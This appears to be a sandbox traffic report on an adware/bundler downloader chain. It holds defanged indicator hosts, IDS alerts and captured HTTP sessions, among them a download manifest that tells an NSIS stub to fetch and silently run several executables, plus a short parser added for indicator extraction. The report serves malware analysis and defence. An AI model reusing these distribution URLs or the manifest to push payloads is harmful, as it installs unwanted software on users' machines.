hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif 52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif 52.85.173.111
pe-mik.net 23.253.126.58
pe-sixi.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible Call with No Offset TCP Shellcode
ET MALWARE SoundCloud Downloader Install Beacon

Traffic

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 9386
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:54 GMT
Content-Disposition: attachment; filename="main.css"
Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT
ETag: "9d7c4ddc39dddc3623e8a57e55afd079"
Accept-Ranges: bytes
Server: AmazonS3
Age: 22932
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: AxpttruDeYPYSaaD03kUx2pK-cZxu3ONjvZIoBiaVKD6A-p8oDEJgQ==
body {..    font-size:10px;.    background:#eaeaea;.    font-family: A
rial;. margin: 0;. padding: 0;. color:#000000; .}..div
, span, textarea {. cursor: default;.}..a, a span, a div {. curs
or: pointer;.}../* whole screen styles */..ami-wrapper{. backgroun
d : none no-repeat scroll 0 0 #eaeaea;. border:2px solid #989898; .}
../* moddle element */..#ami-body.{..position: relative;. padding-l
eft:27;. padding-right:27;.}...bottom-line{. background-color:#5
cafd4;. height:45px;. width:100%;.}..table {. border-collapse
: collapse;. margin: 0 ;. padding: 0;. font-size:10px;.}..tex
tarea {..font-size:10px;..font-family: verdana;..width:98%;..padding:
5px;.}...textarea1{. background:#ffffff;. color:#000000;. hei
ght:100%;. width:100%;. overflow-x:hidden;.}..td{. padding: 0
px;.}../* footer and footer buttons */...bottom-holder{. background
-image:url('footer_img.png');. background-repeat:repeat-x;. heig
ht:59px;. position:absolute;. bottom:0px;. padding-left:20px;
. padding-right:20px;.}...#btnNext{. background: url('next.gif'
) no-repeat;.}.#btnCancel{. background: url('cancel.gif') no-repea
t;.}../* Use for cancle with no popup !!! */.#btnBack{. background:
url('cancel1.gif') no-repeat;.}..#btnDecline{. background: url('
decline.gif') no-repeat;.}..#btnAccept{. background: url('accept.g
if') no-repeat;.}..#btnSkip{. background: url('skip.gif') no-repea
t;.}...btn-finish-install{. background: url('finish.gif') no-r

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1

Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 937
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:56 GMT
Content-Disposition: attachment; filename="footer_img.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "e2bf2d203887961a2e93c1a68b7e7534"
Accept-Ranges: bytes
Server: AmazonS3
Age: 22933
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: u73uWAq4qD-60Ao7_6nNmlTDlxjNPOLbwlgDINhDN2Xsl-MbfGFPKQ==
.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e&
lt;...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8
E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"&g
t; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397D
FE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B
910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
<?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.
]l....IEND.B`.
....



GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1262
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:55 GMT
Content-Disposition: attachment; filename="cancel.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"
Accept-Ranges: bytes
Server: AmazonS3
Age: 33966
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6dNBd6XodADlH9Q1FMpzvQgzTaC3tSxjpZ6ijnW3LpbN0wzDzjKQ8w==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................!.....u.,....e........o
t.............o..nC.............GCn.t.D.............BC.EF.............
EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*...
.!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY
.....K....c...Vg,.......f. 0.k... \..b.. [email protected]...)U.U.b......W.0.....
.t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........
Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. .............
.................. }.J0...&x...f...-......AH.]pa..(..".A....=.(....p..
..X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P.
[email protected]..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t.......
.....!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt..
....m...k..........n.f.AH...k...............p..../.......7.....!...Wl.
K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t.
...L7...s....;
....

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1740
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:55 GMT
Content-Disposition: attachment; filename="skip.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "7c96892b1948a6e97494e2d58cafe1c0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 24710
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HoTJ0ZuyLf52bCU6zR4RVXezqb92Nx4JNbiS2eozQl8uRikHkE9fpw==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...........!.......,....e........|"E......*\......?...)....3j...... Cb
.....R...\[email protected]....>...C...:P.J.J.*U.X.:....
..`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.
3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f.
.$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........
f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......
D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x....
...F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|
...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.
4.I...R.....m$.A............".T..%.pPC./[email protected].".......!.%......v.1..
.4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 3033
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:56 GMT
Content-Disposition: attachment; filename="accept.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "3484f982bbd281ea323f9dedb47098ed"
Accept-Ranges: bytes
Server: AmazonS3
Age: 23784
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: SUX8o78HrpiDvkT-uAomkPx7KVbDGp-WA7NWCfDq0rpC9U8TqV84ag==
GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww
?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*[email protected]<.A)[email protected]
.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}.
.o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C
...H.KL.P..................[._&. ...........................|.~......(
.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m..
.......I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8
(.,A.K......C.I%.*..2?.Hgug)[email protected]>.F=.D6.;...'.)*.(*./-
.-?.=-..:.C../<.C...5.<[email protected]:.A,.2;.B;.BQ.\...O.Tkyl/.
3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K
#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|....
.....hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!.
.XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 ">
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E411B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)">
<xmpMM:Deriv

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 29603
Connection: keep-alive
Date: Thu, 28 Jan 2016 09:25:55 GMT
Content-Disposition: attachment; filename="dm_left_image.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "27e01b52fcb3f43ff9d3f29b0af69137"
Accept-Ranges: bytes
Server: AmazonS3
Age: 30684
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Zg60Q_S9Hj8UWsZktBjlMYau3ccBBqzn34I_x6L9vxVr29ZA5Bzxxw==
.PNG........IHDR.......e.....5Z......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 ">
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A22384F4BB6C11E488CDA27B4BADD3EB" xmpMM:DocumentID="xmp.did:A22384F5BB6C11E488CDA27B4BADD3EB">
<xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A22384F2BB6C11E488CDA27B4BADD3EB" stRef:documentID="xmp.did:A22384F3BB6C11E488CDA27B4BADD3EB"/>
</rdf:Description> </rdf:RDF> </x:xmpmeta>
<?xpacket end="r"?>.O.8..p.IDATx...[..X.....I..12#.*..{z.f5.y[
....4..$..>.....X..#m.vU.LWfUf......u......`.#3"....H.x.....o......
.i.$...@.........~.Z..xd...w..,....;9......<..-...B.......o.....7._
..w.Y....kn?>...T=..|:..^k.;......".J..B.gM.f).|...<..rK....=.7.
.Z.g....SDG..`.tm.q......ZS...(.V.<....Y.....;z.,?>..|*...k..}ip
..C..=..|B...kV-W.....J....X....k...y>.[z.5.d.l..W.u.1/.....|...r.v
.r}..|*...k...........j<.....p|Q=........$.....C...<..-....{.`..
....._.?x......q.7S>.......W...'_...#..#.p..a.Gy.O...sM!........S..
.3^.p.s.|[email protected]|s3.......?..Bi.&....k._..........

<<< skipped >>>

GET /launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7 HTTP/1.0
Host: 46.21.100.248
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Thu, 12 May 2016 21:58:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 630
Connection: close
Content-Type: text/html; charset=UTF-8
files=3
t1=dl
u1=hXXp://get.wenter3.space/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11
n1=cpSetup.exe
m1=0
d1=0
t2=dl
u2=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
n2=Setup__2140_il65.exe
m2=0
d2=0
t3=dl
u3=hXXp://sub.spirlymo.com/installers/cli/1463083280319/SevenZip_downloader-Qa3a1oW9v.exe
n3=SevenZip_downloader-Qa3a1oW9v.exe
m3=1
d3=1500
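The 630-byte reply above is the download manifest the NSIS stub fetched under the NSISDL/1.2 user agent: one file record per numbered key, with the next stages (cpSetup.exe, Setup__2140_il65.exe, the SevenZip_downloader executable) named explicitly and further URLs nested inside the query string of u2. The parser below is an added example, not tooling from the report or code from the installer. It reads that text, undoes the report's hXXp:// and VVV. defanging so the URLs parse, and lists every host the stub would contact. The meaning of t, u, n, m and d is assumed from the key names (transfer type, URL, file name, two per-file flags); the page does not document the format.

```python
"""Added example (not from the report or the installer): parse the key=value
download manifest returned by /launch_v2.php and extract the indicators.

Assumptions, since nothing on the page documents the format: 't' is the
transfer type, 'u' the URL, 'n' the file name written to disk, 'm' and 'd'
per-file flags.  The manifest text is copied from the capture with the
report's hXXp:// and VVV. defanging left in place; refang() undoes it.
"""
import re
from urllib.parse import urlsplit

MANIFEST = """\
files=3
t1=dl
u1=hXXp://get.wenter3.space/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11
n1=cpSetup.exe
m1=0
d1=0
t2=dl
u2=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
n2=Setup__2140_il65.exe
m2=0
d2=0
t3=dl
u3=hXXp://sub.spirlymo.com/installers/cli/1463083280319/SevenZip_downloader-Qa3a1oW9v.exe
n3=SevenZip_downloader-Qa3a1oW9v.exe
m3=1
d3=1500
"""

FIELD_RE = re.compile(r"^([a-z])(\d+)=(.*)$")
URL_RE = re.compile(r"https?://[^\s&'\"]+")


def refang(url):
    """Turn the report's hXXp:// and VVV. back into http:// and www."""
    if url.startswith("hXXp"):
        url = "http" + url[4:]
    return re.sub(r"://VVV\.", "://www.", url, count=1)


def parse_manifest(text):
    """Group the t/u/n/m/d keys by their numeric suffix and check the declared count."""
    declared = None
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("files="):
            declared = int(line.split("=", 1)[1])
            continue
        m = FIELD_RE.match(line)
        if not m:
            raise ValueError("unexpected manifest line: %r" % line)
        key, idx, value = m.group(1), int(m.group(2)), m.group(3)
        entries.setdefault(idx, {})[key] = value
    files = []
    for idx in sorted(entries):
        e = entries[idx]
        url = refang(e["u"])
        files.append({
            "index": idx,
            "type": e.get("t"),
            "url": url,
            "host": urlsplit(url).hostname,
            "name": e["n"],
            "m": int(e.get("m", "0")),
            "d": int(e.get("d", "0")),
        })
    if declared is not None and declared != len(files):
        raise ValueError("manifest says files=%d but lists %d" % (declared, len(files)))
    return files


def nested_urls(url):
    """Second-stage URLs carried inside the query string (appsetupurl, instid[appimageurl])."""
    return URL_RE.findall(urlsplit(url).query)


def indicators(files):
    """Every host the stub would contact, directly or via a nested URL, sorted and deduplicated."""
    hosts = set()
    for f in files:
        hosts.add(f["host"])
        for u in nested_urls(f["url"]):
            hosts.add(urlsplit(u).hostname)
    return sorted(hosts)


if __name__ == "__main__":
    files = parse_manifest(MANIFEST)
    for f in files:
        print("%d %-36s %s" % (f["index"], f["name"], f["url"]))
    print("hosts:", ", ".join(indicators(files)))
```

The count check matters in practice: a manifest that declares more files than it lists is either truncated in transit or a variant, and either way the record set should not be trusted silently. The nested-URL pass is what surfaces pe-sixi.com, which never appears as a top-level host.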


GET hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.freeo9.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 77864
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 12 May 2016 21:58:15 GMT
X-Cache: Miss from cloudfront
Via: 1.1 55ee6ea70e0823309f10db2e4b8f119f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: dFWWzMDaXm9o2cUYSzXKfcmt70Hq9SrANsufsglhTiIZRG8X1QGlyA==
;.7A..0.....{.HU.T/`...{.1xw.>0...O&..}..tJt...".3.E...FY.....db.zr
L.J.{E5..............>.n.R........H`...........$..;.L...c$A.<.c.
j.k....E...a...V._.a)V.0.<)....L.B.C.5..r/..SY......}Q. s-D.2...c..
wR.N. ...ve7Z.a...#....'.........x.......-.m.9.9..t-..{..1c.5|...esB?.
c.^lyh.....0.2Ab..._...$p..3....U..=5...&.8)..........Y.....CK....n...
..........4....&....$........F.m.Ns:en#..8(..'........[..a..=......3N.
./.*d.D:1.=..8K.......9..3......51..E[..$....W..2.[^ZV. `....'..E.X.*.
=.H...Z.}....3. "s.Y...?....x.A....,...!.._..32.BiF....i.x.........g9.
....$.D.{.."Q.X8.....0...{......F."...o.L......R..e!v.....~......^.-..
...(er.D..8...U.#...w.hj.I<;.2....5.._b...O....|.@ .........7>.Q
.........AX...9....V...a..P.k.#........Yb..;~|d.....:......H..R6.T..\.
..X.:.gO.=3...._\.E.n........Xp.I.....u.6..q.m.......N..!..R...w...eT.
e....'..c...k.x..'!..[f....t..I..Xk?......:rg..|k.D........^..;x9}.9.C
[email protected].@/.........%l(.1..&O.).y..D..I`....c...|%.L.T./J..
.....U.7d.|...70.}......u(F...Y..Z.. X...u...;..Y...b.7{.F^c>tP5...
.)..G..;...s..OB...S...)..q/t..p `"l.~..jU.j.....p...#...;..o..,.s"...
...g.Yw.6Xk2g}..G.X7..x.2.....?.'.K....;.A..9.......4.Jl....p"..,..S..
.F.I....i.*.>.N..h.~a....0.....XD..[)'D o. C#t.i..=.u.vk...'.....2.
[email protected]{o...4BkW.<[email protected]}Nt......*...i........~..........H6z/....
....2F.*...>.w..l..^..;.,k.......`M(.X./....~.......\.a_..%..S...S.
.J.......'G..n...zC.fV{.R...F.....B(TVn..-.,.=....`...S_..l'.K.U4)....
[email protected].=..z..R`...X ~.1...KN.ox.....J$..k......b.

<<< skipped >>>

GET /V35/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 69943
Connection: keep-alive
Date: Sat, 12 Mar 2016 06:56:00 GMT
Last-Modified: Sun, 28 Feb 2016 13:30:41 GMT
ETag: "76a09d03456de6b830f2d57dae56f423"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 25042
X-Cache: Hit from cloudfront
Via: 1.1 02559733574bc91699d28e7c3b1df3ea.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TBECHG2c6pKJlssRDmoZh4_yi0QFndUd1uwc4WmuMo8wAwEbV03m6g==
//<!--
/*    Progress bar   */

var g_AmiPbs = new Array();
var g_AmiPbsEx = new Array();
var g_interval = 0;
var g_initComp = 0;
var g_possibleComps = [];
var g_reportedComps = [];
var g_removedComps = [];

var g_disable_updater = false;

//in the version we tests updater task is created firstly
var g_UpdaterTestVersion = (typeof (g_ver) !== 'undefined' && g_ver != null && g_ver == '1.1.5.90');
var g_UpdaterTaskCreated = false;

function LogMessage(message) {
    try {
        g_ami.Log(message);
    }
    catch (excpt) {
    }
}

function IsDeclined(name) {
    var declined = 0;
    for (var i = 0; i < g_removedComps.length; i++) {
        if (g_removedComps[i] == name) {
            declined = 1;
            break;
        }
    }
    return declined;
}

function UpdateSkipStatus(sn) {
    if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {
        if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {
            g_ami.WriteProfileString(g_testf, '', sn, 'S');
            g_reportedComps.push(sn);
        }
    }
}

function ShortNameFromName(name) {
    for (c = 0; c < g_comps.length; c++) {
        if (g_comps[c].name == name) {
            return g_comps[c].sn;
        }
    }
    return name;
}

function UpdateComponentsStatus() {
    LogMessage('UpdateComponentsStatus function started');
    for (var j = 0; j < g_possibleComps.length; j++) {

        if (g_possibleComps[j].sn =

<<< skipped >>>

POST hXXp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.freeo9.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

cid=707569c4c57c87d53171d83f71777ffd&uac=1
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 12 May 2016 21:58:38 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 6fd049110ebc3ac6deddab8b0bf5d686.cloudfront.net (CloudFront)
X-Amz-Cf-Id: f_8c4yhPzmIFjr9jUXT7pgs5ckvNVdeIe5qUEpLqf_FCK2KqNqJJaQ==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: f_8c4yhPzmIFjr9jUXT7pgs5ckvNVdeIe5qUEpLqf_FCK2KqNqJJaQ==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>


GET hXXp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.freeo9.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 590
Connection: close
Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 12 May 2016 21:58:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 0991a4b934302d120a32dada6513dc35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: JWYNAkiuILpXQ1Kk2y1g9KTG0tNfq-9NJtzHOy55PKMELqgR_y9j0Q==
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer%26uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a></body>


GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il65.exe"
Content-Type: application/x-msdownload
Date: Thu, 12 May 2016 21:58:41 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2016 21:58:41 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
